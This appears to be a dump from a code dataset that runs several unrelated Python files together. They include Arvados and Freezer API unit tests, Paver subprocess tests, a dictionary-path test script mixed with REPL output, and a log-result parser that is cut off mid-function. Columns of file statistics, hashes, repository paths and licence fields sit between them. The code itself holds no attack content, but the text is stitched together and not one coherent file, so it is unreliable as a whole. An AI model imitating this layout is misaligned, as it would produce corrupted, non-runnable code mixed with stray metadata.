api.collections().update.assert_has_calls([
mock.call(uuid=cm.manifest_locator(),
body={"collection":{"properties": {'http://example.com/file1.txt': {
'Date': 'Tue, 17 May 2018 00:00:00 GMT',
'Expires': 'Tue, 19 May 2018 00:00:00 GMT',
'ETag': '123456'
}}}})
])
@mock.patch("requests.get")
@mock.patch("arvados.collection.Collection")
def test_http_content_disp(self, collectionmock, getmock):
api = mock.MagicMock()
api.collections().list().execute.return_value = {
"items": []
}
cm = mock.MagicMock()
cm.manifest_locator.return_value = "zzzzz-4zz18-zzzzzzzzzzzzzz3"
cm.portable_data_hash.return_value = "99999999999999999999999999999998+99"
collectionmock.return_value = cm
req = mock.MagicMock()
req.status_code = 200
req.headers = {"Content-Disposition": "attachment; filename=file1.txt"}
req.iter_content.return_value = ["abc"]
getmock.return_value = req
utcnow = mock.MagicMock()
utcnow.return_value = datetime.datetime(2018, 5, 15)
r = arvados_cwl.http.http_to_keep(api, None, "http://example.com/download?fn=/file1.txt", utcnow=utcnow)
self.assertEqual(r, "keep:99999999999999999999999999999998+99/file1.txt")
getmock.assert_called_with("http://example.com/download?fn=/file1.txt", stream=True, allow_redirects=True)
cm.open.assert_called_with("file1.txt", "wb")
cm.save_new.assert_called_with(name="Downloaded from http%3A%2F%2Fexample.com%2Fdownload%3Ffn%3D%2Ffile1.txt",
owner_uuid=None, ensure_unique_name=True)
api.collections().update.assert_has_calls([
mock.call(uuid=cm.manifest_locator(),
body={"collection":{"properties": {"http://example.com/download?fn=/file1.txt": {'Date': 'Tue, 15 May 2018 00:00:00 GMT'}}}})
])
| 37.327586
| 147
| 0.603695
| 1,187
| 10,825
| 5.357203
| 0.129739
| 0.079572
| 0.037427
| 0.025947
| 0.881742
| 0.877811
| 0.873251
| 0.868533
| 0.859097
| 0.859097
| 0
| 0.113668
| 0.269376
| 10,825
| 289
| 148
| 37.456747
| 0.690353
| 0.008406
| 0
| 0.72
| 0
| 0.004444
| 0.264492
| 0.115471
| 0
| 0
| 0
| 0
| 0.102222
| 1
| 0.026667
| false
| 0
| 0.088889
| 0
| 0.12
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
689a155ea464ee88088a610359b6dae4284d2c07
| 42
|
py
|
Python
|
server/jio.py
|
simon816/Project-Awesomeness
|
ab7f156dd62cbdfe8b85d0372688d9bd2c6cf952
|
[
"MIT"
] | 1
|
2019-05-25T16:28:25.000Z
|
2019-05-25T16:28:25.000Z
|
server/jio.py
|
simon816/Project-Awesomeness
|
ab7f156dd62cbdfe8b85d0372688d9bd2c6cf952
|
[
"MIT"
] | null | null | null |
server/jio.py
|
simon816/Project-Awesomeness
|
ab7f156dd62cbdfe8b85d0372688d9bd2c6cf952
|
[
"MIT"
] | null | null | null |
from io_in import *
from io_out import *
| 10.5
| 20
| 0.738095
| 8
| 42
| 3.625
| 0.625
| 0.413793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.214286
| 42
| 3
| 21
| 14
| 0.878788
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d7de36332a2c00ab6f6e1bbd3190cb4576d532a7
| 14,152
|
py
|
Python
|
freezer-api-7.1.0/freezer_api/tests/unit/sqlalchemy/v2/test_client.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 22
|
2015-10-18T02:53:47.000Z
|
2021-09-19T10:38:12.000Z
|
freezer-api-7.1.0/freezer_api/tests/unit/sqlalchemy/v2/test_client.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 5
|
2019-08-14T06:46:03.000Z
|
2021-12-13T20:01:25.000Z
|
freezer-api-7.1.0/freezer_api/tests/unit/sqlalchemy/v2/test_client.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 20
|
2016-03-08T08:34:56.000Z
|
2020-10-13T06:50:05.000Z
|
# (c) Copyright 2018 ZTE Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for manipulating Client via the DB API"""
import copy
from freezer_api.tests.unit import common
from freezer_api.tests.unit.sqlalchemy import base
class DbClientTestCase(base.DbTestCase):
def setUp(self):
super(DbClientTestCase, self).setUp()
self.fake_client_0 = common.get_fake_client_0()
self.fake_client_doc = self.fake_client_0.get('client')
self.fake_user_id = self.fake_client_0.get('user_id')
self.fake_project_id = self.fake_client_doc.get('project_id')
def test_add_and_get_client(self):
client_doc = copy.deepcopy(self.fake_client_doc)
client_id = self.dbapi.add_client(user_id=self.fake_user_id,
doc=client_doc,
project_id=self.fake_project_id)
self.assertIsNotNone(client_id)
result = self.dbapi.get_client(project_id=self.fake_project_id,
user_id=self.fake_user_id,
client_id=client_id)
self.assertIsNotNone(result)
self.assertEqual(len(result), 1)
self.assertEqual(result[0].get('user_id'),
self.fake_user_id)
client = result[0].get('client')
self.assertEqual(client.get('client_id'),
self.fake_client_doc.get('client_id'))
self.assertEqual(client.get('description'),
self.fake_client_doc.get('description'))
def test_add_and_delete_client(self):
client_doc = copy.deepcopy(self.fake_client_doc)
client_id = self.dbapi.add_client(user_id=self.fake_user_id,
doc=client_doc,
project_id=self.fake_project_id)
self.assertIsNotNone(client_id)
result = self.dbapi.delete_client(project_id=self.fake_project_id,
user_id=self.fake_user_id,
client_id=client_id)
self.assertIsNotNone(result)
self.assertEqual(result, client_id)
result = self.dbapi.get_client(project_id=self.fake_project_id,
user_id=self.fake_user_id,
client_id=client_id)
self.assertEqual(len(result), 0)
def test_add_and_search_client(self):
count = 0
clientids = []
while (count < 20):
client_doc = copy.deepcopy(self.fake_client_doc)
clientid = common.get_fake_client_id()
client_doc['client_id'] = clientid
client_id = self.dbapi.add_client(user_id=self.fake_user_id,
doc=client_doc,
project_id=self.fake_project_id)
self.assertIsNotNone(client_id)
self.assertEqual(clientid, client_id)
clientids.append(client_id)
count += 1
result = self.dbapi.get_client(project_id=self.fake_project_id,
user_id=self.fake_user_id,
limit=10,
offset=0)
self.assertIsNotNone(result)
self.assertEqual(len(result), 10)
for index in range(len(result)):
clientmap = result[index]
clientid = clientmap['client'].get('client_id')
self.assertEqual(clientids[index], clientid)
def test_add_and_search_client_with_search_match_and_match_not(self):
count = 0
clientids = []
while (count < 20):
client_doc = copy.deepcopy(self.fake_client_doc)
clientid = common.get_fake_client_id()
client_doc['client_id'] = clientid
client_doc['hostname'] = "node1"
if count in [0, 4, 8, 12, 16]:
client_doc['description'] = "tecs"
if count in [4, 12]:
client_doc['hostname'] = 'node2'
client_id = self.dbapi.add_client(user_id=self.fake_user_id,
doc=client_doc,
project_id=self.fake_project_id)
self.assertIsNotNone(client_id)
self.assertEqual(clientid, client_id)
clientids.append(client_id)
count += 1
search_opt = {'match_not': [{'hostname': 'node2'}],
'match': [{'description': 'tecs'}]}
result = self.dbapi.get_client(project_id=self.fake_project_id,
user_id=self.fake_user_id,
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 3)
for index in range(len(result)):
clientmap = result[index]
hostname = clientmap['client'].get('hostname')
description = clientmap['client'].get('description')
self.assertEqual('node1', hostname)
self.assertEqual('tecs', description)
def test_add_and_search_client_with_search_match_list(self):
count = 0
clientids = []
while (count < 20):
client_doc = copy.deepcopy(self.fake_client_doc)
clientid = common.get_fake_client_id()
client_doc['client_id'] = clientid
client_doc['hostname'] = "node1"
if count in [0, 4, 8, 12, 16]:
client_doc['description'] = "tecs"
if count in [4, 12]:
client_doc['hostname'] = 'node2'
client_id = self.dbapi.add_client(user_id=self.fake_user_id,
doc=client_doc,
project_id=self.fake_project_id)
self.assertIsNotNone(client_id)
self.assertEqual(clientid, client_id)
clientids.append(client_id)
count += 1
search_opt = {'match': [{'hostname': 'node2'},
{'description': 'tecs'}]}
result = self.dbapi.get_client(project_id=self.fake_project_id,
user_id=self.fake_user_id,
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 2)
for index in range(len(result)):
clientmap = result[index]
hostname = clientmap['client'].get('hostname')
description = clientmap['client'].get('description')
self.assertEqual('node2', hostname)
self.assertEqual('tecs', description)
def test_add_and_search_client_with_search_match_not_list(self):
count = 0
clientids = []
while (count < 20):
client_doc = copy.deepcopy(self.fake_client_doc)
clientid = common.get_fake_client_id()
client_doc['client_id'] = clientid
client_doc['hostname'] = "node1"
if count in [0, 4, 8, 12, 16]:
client_doc['description'] = "tecs"
if count in [4, 12]:
client_doc['hostname'] = 'node2'
client_id = self.dbapi.add_client(user_id=self.fake_user_id,
doc=client_doc,
project_id=self.fake_project_id)
self.assertIsNotNone(client_id)
self.assertEqual(clientid, client_id)
clientids.append(client_id)
count += 1
search_opt = {'match_not': [{'hostname': 'node2'},
{'description': 'some usefule text here'}]}
result = self.dbapi.get_client(project_id=self.fake_project_id,
user_id=self.fake_user_id,
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 3)
for index in range(len(result)):
clientmap = result[index]
hostname = clientmap['client'].get('hostname')
description = clientmap['client'].get('description')
self.assertEqual('node1', hostname)
self.assertEqual('tecs', description)
def test_add_and_search_client_with_all_opt_one_match(self):
count = 0
clientids = []
while (count < 20):
client_doc = copy.deepcopy(self.fake_client_doc)
clientid = common.get_fake_client_id()
client_doc['client_id'] = clientid
client_doc['hostname'] = "node1"
if count in [0, 4, 8, 12, 16]:
client_doc['description'] = "tecs"
client_id = self.dbapi.add_client(user_id=self.fake_user_id,
doc=client_doc,
project_id=self.fake_project_id)
self.assertIsNotNone(client_id)
self.assertEqual(clientid, client_id)
clientids.append(client_id)
count += 1
search_opt = {'match': [{'_all': '[{"description": "tecs"}]'}]}
result = self.dbapi.get_client(project_id=self.fake_project_id,
user_id=self.fake_user_id,
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 5)
for index in range(len(result)):
clientmap = result[index]
description = clientmap['client'].get('description')
self.assertEqual('tecs', description)
def test_add_and_search_client_with_all_opt_two_match(self):
count = 0
clientids = []
while (count < 20):
client_doc = copy.deepcopy(self.fake_client_doc)
clientid = common.get_fake_client_id()
client_doc['client_id'] = clientid
client_doc['hostname'] = "node1"
if count in [0, 4, 8, 12, 16]:
client_doc['hostname'] = "node2"
if count in [4, 12]:
client_doc['description'] = "tecs"
client_id = self.dbapi.add_client(user_id=self.fake_user_id,
doc=client_doc,
project_id=self.fake_project_id)
self.assertIsNotNone(client_id)
self.assertEqual(clientid, client_id)
clientids.append(client_id)
count += 1
search_opt = {'match':
[{'_all':
'[{"description": "tecs"}, '
'{"hostname": "node2"}]'}]}
result = self.dbapi.get_client(project_id=self.fake_project_id,
user_id=self.fake_user_id,
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 2)
for index in range(len(result)):
clientmap = result[index]
description = clientmap['client'].get('description')
hostname = clientmap['client'].get('hostname')
self.assertEqual('tecs', description)
self.assertEqual('node2', hostname)
def test_add_and_search_client_with_error_all_opt_return_alltuples(self):
count = 0
clientids = []
while (count < 20):
client_doc = copy.deepcopy(self.fake_client_doc)
clientid = common.get_fake_client_id()
client_doc['client_id'] = clientid
client_doc['hostname'] = "node1"
if count in [0, 4, 8, 12, 16]:
client_doc['hostname'] = "node2"
client_id = self.dbapi.add_client(user_id=self.fake_user_id,
doc=client_doc,
project_id=self.fake_project_id)
self.assertIsNotNone(client_id)
self.assertEqual(clientid, client_id)
clientids.append(client_id)
count += 1
search_opt = {'match': [{'_all': '{"hostname": "node2"}'}]}
result = self.dbapi.get_client(project_id=self.fake_project_id,
user_id=self.fake_user_id,
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 20)
search_opt = {'match': [{'_all': 'hostname=node2'}]}
result = self.dbapi.get_client(project_id=self.fake_project_id,
user_id=self.fake_user_id,
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 20)
| 41.139535
| 79
| 0.524096
| 1,466
| 14,152
| 4.797408
| 0.095498
| 0.063984
| 0.063984
| 0.045784
| 0.861937
| 0.820845
| 0.80691
| 0.789137
| 0.789137
| 0.777193
| 0
| 0.01759
| 0.38136
| 14,152
| 343
| 80
| 41.259475
| 0.785722
| 0.046142
| 0
| 0.816479
| 0
| 0
| 0.06135
| 0
| 0
| 0
| 0
| 0
| 0.187266
| 1
| 0.037453
| false
| 0
| 0.011236
| 0
| 0.052434
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cc15e8b406827fc522c5723a965cf0f3f8e618e8
| 44
|
py
|
Python
|
src/reverse/reverse/__init__.py
|
fugue/zim-example
|
861b197ddc1074375bb9437b3282ab3e517b9019
|
[
"MIT"
] | null | null | null |
src/reverse/reverse/__init__.py
|
fugue/zim-example
|
861b197ddc1074375bb9437b3282ab3e517b9019
|
[
"MIT"
] | null | null | null |
src/reverse/reverse/__init__.py
|
fugue/zim-example
|
861b197ddc1074375bb9437b3282ab3e517b9019
|
[
"MIT"
] | 2
|
2021-03-17T03:02:52.000Z
|
2021-07-21T23:31:08.000Z
|
from reverse.handler import reverse_handler
| 22
| 43
| 0.886364
| 6
| 44
| 6.333333
| 0.666667
| 0.736842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 44
| 1
| 44
| 44
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cc1e92d97151874bb5edb5eb6ea6e3b315df6745
| 118
|
py
|
Python
|
PDSUtilities/xgboost/__init__.py
|
DrJohnWagner/PDSUtilities
|
ffad1a02f78f46acdf4bd65d7c2eb063af7dbc13
|
[
"Apache-2.0"
] | null | null | null |
PDSUtilities/xgboost/__init__.py
|
DrJohnWagner/PDSUtilities
|
ffad1a02f78f46acdf4bd65d7c2eb063af7dbc13
|
[
"Apache-2.0"
] | 12
|
2022-01-18T06:21:03.000Z
|
2022-01-20T07:29:56.000Z
|
PDSUtilities/xgboost/__init__.py
|
DrJohnWagner/PDSUtilities
|
ffad1a02f78f46acdf4bd65d7c2eb063af7dbc13
|
[
"Apache-2.0"
] | null | null | null |
from PDSUtilities.xgboost.plot_tree import plot_tree
from PDSUtilities.xgboost.plot_importance import plot_importance
| 39.333333
| 64
| 0.898305
| 16
| 118
| 6.375
| 0.4375
| 0.313725
| 0.45098
| 0.529412
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067797
| 118
| 2
| 65
| 59
| 0.927273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
04134593c149d7f0dbe9b04b47969b6588140d4b
| 2,396
|
py
|
Python
|
paver/tests/test_easy.py
|
jrossi/paver
|
db4ea25ed1c986c766fd3424aeae34d9b28ac937
|
[
"BSD-3-Clause"
] | 1
|
2015-02-09T19:59:44.000Z
|
2015-02-09T19:59:44.000Z
|
paver/tests/test_easy.py
|
jrossi/paver
|
db4ea25ed1c986c766fd3424aeae34d9b28ac937
|
[
"BSD-3-Clause"
] | null | null | null |
paver/tests/test_easy.py
|
jrossi/paver
|
db4ea25ed1c986c766fd3424aeae34d9b28ac937
|
[
"BSD-3-Clause"
] | null | null | null |
from paver import easy
from paver.tests.mock import patch, Mock
import subprocess # for easy.sh tests
@patch(subprocess, "Popen")
@patch(easy, "error")
def test_sh_raises_BuildFailure(popen, error):
popen.return_value = Mock()
popen.return_value.returncode = 1
popen.return_value.stderr.read.return_value = 'some stderr'
try:
easy.sh('foo')
except easy.BuildFailure, e:
args = e.args
assert args == ('Subprocess return code: 1', )
else:
assert False, 'Failed to raise BuildFailure'
assert popen.called
assert popen.call_args[0][0] == 'foo'
assert popen.call_args[1]['shell'] == True
assert 'stdout' not in popen.call_args[1]
assert error.called
assert error.call_args == (('some stderr', ), {})
@patch(subprocess, "Popen")
def test_sh_with_capture_raises_BuildFailure(popen):
popen.return_value = Mock()
popen.return_value.returncode = 1
popen.return_value.stderr.read.return_value = 'some stderr'
try:
easy.sh('foo', capture=True)
except easy.BuildFailure, e:
args = e.args
assert args == ('Subprocess return code: 1', )
else:
assert False, 'Failed to raise BuildFailure'
assert popen.called
assert popen.call_args[0][0] == 'foo'
assert popen.call_args[1]['shell'] == True
assert popen.call_args[1]['stdout'] == subprocess.PIPE
assert popen.call_args[1]['stderr'] == subprocess.PIPE
@patch(subprocess, "Popen")
def test_sh_ignores_error(popen):
popen.return_value = Mock()
popen.return_value.returncode = 1
popen.return_value.stderr.read.return_value = 'some stderr'
easy.sh('foo', ignore_error=True)
assert popen.called
assert popen.call_args[0][0] == 'foo'
assert popen.call_args[1]['shell'] == True
assert 'stdout' not in popen.call_args[1]
assert popen.call_args[1]['stderr'] == subprocess.PIPE
@patch(subprocess, "Popen")
def test_sh_ignores_error_with_capture(popen):
popen.return_value = Mock()
popen.return_value.returncode = 1
popen.return_value.stderr.read.return_value = 'some stderr'
easy.sh('foo', capture=True, ignore_error=True)
assert popen.called
assert popen.call_args[0][0] == 'foo'
assert popen.call_args[1]['shell'] == True
assert popen.call_args[1]['stdout'] == subprocess.PIPE
assert popen.call_args[1]['stderr'] == subprocess.PIPE
| 32.378378
| 63
| 0.681553
| 330
| 2,396
| 4.79697
| 0.145455
| 0.11813
| 0.123184
| 0.156033
| 0.852811
| 0.838913
| 0.820594
| 0.820594
| 0.820594
| 0.820594
| 0
| 0.012814
| 0.185726
| 2,396
| 73
| 64
| 32.821918
| 0.798565
| 0.007095
| 0
| 0.770492
| 0
| 0
| 0.11443
| 0
| 0
| 0
| 0
| 0
| 0.409836
| 0
| null | null | 0
| 0.04918
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
043b2ea525bd81b7fc943a348f887ae96d009796
| 110
|
py
|
Python
|
lattice/tasks/__init__.py
|
siq/lattice
|
0824981eb829704240d1e088cf414f1cc5487ede
|
[
"Linux-OpenIB"
] | 1
|
2015-09-18T16:23:03.000Z
|
2015-09-18T16:23:03.000Z
|
lattice/tasks/__init__.py
|
siq/lattice
|
0824981eb829704240d1e088cf414f1cc5487ede
|
[
"Linux-OpenIB"
] | null | null | null |
lattice/tasks/__init__.py
|
siq/lattice
|
0824981eb829704240d1e088cf414f1cc5487ede
|
[
"Linux-OpenIB"
] | null | null | null |
import lattice.tasks.component
import lattice.tasks.profile
import lattice.tasks.deb
import lattice.tasks.rpm
| 22
| 30
| 0.854545
| 16
| 110
| 5.875
| 0.4375
| 0.553191
| 0.765957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072727
| 110
| 4
| 31
| 27.5
| 0.921569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f09e3d4e935bf95bf7cbbba0ff1d6a54a90c0205
| 3,989
|
py
|
Python
|
TEST/dict_func.tst.py
|
ihgazni2/nvdict
|
d439f6ae409a3d5da13edaa968ff726274209cf4
|
[
"MIT"
] | null | null | null |
TEST/dict_func.tst.py
|
ihgazni2/nvdict
|
d439f6ae409a3d5da13edaa968ff726274209cf4
|
[
"MIT"
] | null | null | null |
TEST/dict_func.tst.py
|
ihgazni2/nvdict
|
d439f6ae409a3d5da13edaa968ff726274209cf4
|
[
"MIT"
] | null | null | null |
d = {
'open':{
'conn':'open.conn',
'auth': {
'challenge':'open.auth.challenge',
'answer':'open.auth.answer',
'succ':'open.auth.succ',
'fail':'open.auth.fail'
}
},
'keepalive':{
'ping':"keepalive.ping",
'pong':"keepalive.pong",
},
'signal':{
'room':{
'join':'signal.room.join',
'leave':'signal.room.leave',
},
'channel':{
'join':'signal.channel.join',
'leave':'signal.channel.leave',
},
},
'data':'data',
'close':'close'
}
from xdict.jprint import pobj
>>> pobj(get_via_pl(d,['open']))
{
'conn': 'open.conn',
'auth':
{
'challenge': 'open.auth.challenge',
'answer': 'open.auth.answer',
'succ': 'open.auth.succ',
'fail': 'open.auth.fail'
}
}
>>> pobj(get_via_pl(d,['open','auth']))
{
'challenge': 'open.auth.challenge',
'answer': 'open.auth.answer',
'succ': 'open.auth.succ',
'fail': 'open.auth.fail'
}
>>> get_via_pl(d,['open','auth','challenge'])
'open.auth.challenge'
>>>
dd = {}
set_dflt_via_pl(dd,['open','conn'])
set_dflt_via_pl(dd,['open','auth','challenge'])
set_dflt_via_pl(dd,['open','auth','answer'])
set_dflt_via_pl(dd,['open','auth','succ'])
set_dflt_via_pl(dd,['open','auth','fail'])
set_dflt_via_pl(dd,['keepalive','ping'])
set_dflt_via_pl(dd,['keepalive','pong'])
set_dflt_via_pl(dd,['signal','room','join'])
set_dflt_via_pl(dd,['signal','room','leave'])
set_dflt_via_pl(dd,['signal','channel','join'])
set_dflt_via_pl(dd,['signal','channel','leave'])
set_dflt_via_pl(dd,['data'])
set_dflt_via_pl(dd,['close'])
set_via_pl(dd,['open','conn'],'open.conn')
set_via_pl(dd,['open','auth','challenge'],'open.auth.challenge')
set_via_pl(dd,['open','auth','answer'],'open.auth.answer')
set_via_pl(dd,['open','auth','succ'],'open.auth.succ')
set_via_pl(dd,['open','auth','fail'],'open.auth.fail')
set_via_pl(dd,['keepalive','ping'],'keepalive.ping')
set_via_pl(dd,['keepalive','pong'],'keepalive.pong')
set_via_pl(dd,['signal','room','join'],'signal.room.join')
set_via_pl(dd,['signal','room','leave'],'signal.room.leave')
set_via_pl(dd,['signal','channel','join'],'signal.channel.join')
set_via_pl(dd,['signal','channel','leave'],'signal.channel.leave')
set_via_pl(dd,['data'],'data')
set_via_pl(dd,['close'],'close')
assert(dd==d)
dd = {}
set_dflt_via_pl(dd,['open','conn'],'open.conn')
set_dflt_via_pl(dd,['open','auth','challenge'],'open.auth.challenge')
set_dflt_via_pl(dd,['open','auth','answer'],'open.auth.answer')
set_dflt_via_pl(dd,['open','auth','succ'],'open.auth.succ')
set_dflt_via_pl(dd,['open','auth','fail'],'open.auth.fail')
set_dflt_via_pl(dd,['keepalive','ping'],'keepalive.ping')
set_dflt_via_pl(dd,['keepalive','pong'],'keepalive.pong')
set_dflt_via_pl(dd,['signal','room','join'],'signal.room.join')
set_dflt_via_pl(dd,['signal','room','leave'],'signal.room.leave')
set_dflt_via_pl(dd,['signal','channel','join'],'signal.channel.join')
set_dflt_via_pl(dd,['signal','channel','leave'],'signal.channel.leave')
set_dflt_via_pl(dd,['data'],'data')
set_dflt_via_pl(dd,['close'],'close')
assert(dd==d)
del_via_pl(d,['data'])
del_via_pl(d,['open','auth'])
{'challenge': 'open.auth.challenge', 'answer': 'open.auth.answer', 'succ': 'open.auth.succ', 'fail': 'open.auth.fail'}
>>> pobj(d)
{
'open':
{
'conn': 'open.conn'
},
'keepalive':
{
'ping': 'keepalive.ping',
'pong': 'keepalive.pong'
},
'signal':
{
'room':
{
'join': 'signal.room.join',
'leave': 'signal.room.leave'
},
'channel':
{
'join': 'signal.channel.join',
'leave': 'signal.channel.leave'
}
},
'close': 'close'
}
| 28.091549
| 118
| 0.566057
| 527
| 3,989
| 4.068311
| 0.058824
| 0.102612
| 0.127332
| 0.145522
| 0.967817
| 0.958489
| 0.944496
| 0.930504
| 0.841884
| 0.801306
| 0
| 0
| 0.18927
| 3,989
| 141
| 119
| 28.29078
| 0.662956
| 0
| 0
| 0.198347
| 0
| 0
| 0.411189
| 0
| 0
| 0
| 0
| 0
| 0.016529
| 0
| null | null | 0
| 0.008264
| null | null | 0.008264
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f0b63186e476cb72adaa3401fd5290b7fa72cc87
| 7,271
|
py
|
Python
|
result_parser.py
|
ninima0323/TestGUI
|
f6e01c98c410996e4b7663b0ee65cf0d192a10e3
|
[
"MIT"
] | 1
|
2020-06-25T02:14:27.000Z
|
2020-06-25T02:14:27.000Z
|
result_parser.py
|
ninima0323/TestGUI
|
f6e01c98c410996e4b7663b0ee65cf0d192a10e3
|
[
"MIT"
] | null | null | null |
result_parser.py
|
ninima0323/TestGUI
|
f6e01c98c410996e4b7663b0ee65cf0d192a10e3
|
[
"MIT"
] | null | null | null |
import os
def isValidRange(val):
if 0 < val < 65279:
return True
else:
return False
PADDING_FOR_TIME = 0.2
PADDING_FOR_VALUE = 50
def analyze_result(log_path):
with open(log_path, 'r') as f:
lines = f.readlines()[1:]
result_list = []
line_read = []
line_command = []
for line in lines:
origin_line = line.split('\n')[0]
line = line.split('\n')[0].split(';')
if line[1] == "COMMAND_TASK":
line_command = line
elif line[1] == "READ_ATTRIBUTE_TASK":
line_read = line
if line_command != []:
if 'COLOR_CTRL' == line_command[2]: # color ctrl
input_cmd = line_command[3]
input_val = int(line_command[4].split(',')[0][2:])
input_duration = float(line_command[4].split(',')[2][2:]) * 0.1
interval = float(line_command[5])
output_val = int(line_read[5])
if input_val == output_val : # OK
result_list.append(line_command.append("OK"))
result_list.append(line_read.append("OK"))
else:
if interval > input_duration: # enough to transit color or temperature to the target point
if (interval - input_duration) <= PADDING_FOR_TIME:
e = "Error : The interval value may be short compared to the transition time."
line_command.append(e)
line_read.append(e)
result_list.append(line_command)
result_list.append(line_read)
elif (abs(output_val - input_val) <= PADDING_FOR_VALUE):
e = "Error : The distance between the input value and the output value is too far for the given transition time."
line_command.append(e)
line_read.append(e)
result_list.append(line_command)
result_list.append(line_read)
else: # short to transit color or temperature to the target point
e = "Error : The interval value may be short compared to the transition time."
line_command.append(e)
line_read.append(e)
result_list.append(line_command)
result_list.append(line_read)
elif 'LVL_CTRL' == line_command[2]: # color ctrl
input_cmd = line_command[3]
input_val = int(line_command[4].split(',')[0][2:])
input_duration = float(line_command[4].split(',')[2][2:]) * 0.1
interval = float(line_command[5])
output_val = int(line_read[5])
if input_val == output_val : # OK
line_command.append("OK")
line_read.append("OK")
result_list.append(line_command)
result_list.append(line_read)
else:
if interval > input_duration: # enough to transit color or temperature to the target point
if (interval - input_duration) <= PADDING_FOR_TIME:
e = "Error : The interval value may be short compared to the transition time."
line_command.append(e)
line_read.append(e)
result_list.append(line_command)
result_list.append(line_read)
elif (abs(output_val - input_val) <= PADDING_FOR_VALUE): # change to abs(previous output - current input)
e= "Error : The distance between the input value and the output value is too far for the given transition time."
line_command.append(e)
line_read.append(e)
result_list.append(line_command)
result_list.append(line_read)
else: # short to transit color or temperature to the target point
e = "Error : The interval value may be short compared to the transition time."
line_command.append(e)
line_read.append(e)
result_list.append(line_command)
result_list.append(line_read)
elif 'ON_OFF' == line_command[2]:
input_cmd = line_command[3]
input_val = "True" if input_cmd == "ON" else "False"
input_duration = 0.1
interval = float(line_command[5])
output_val = line_read[5]
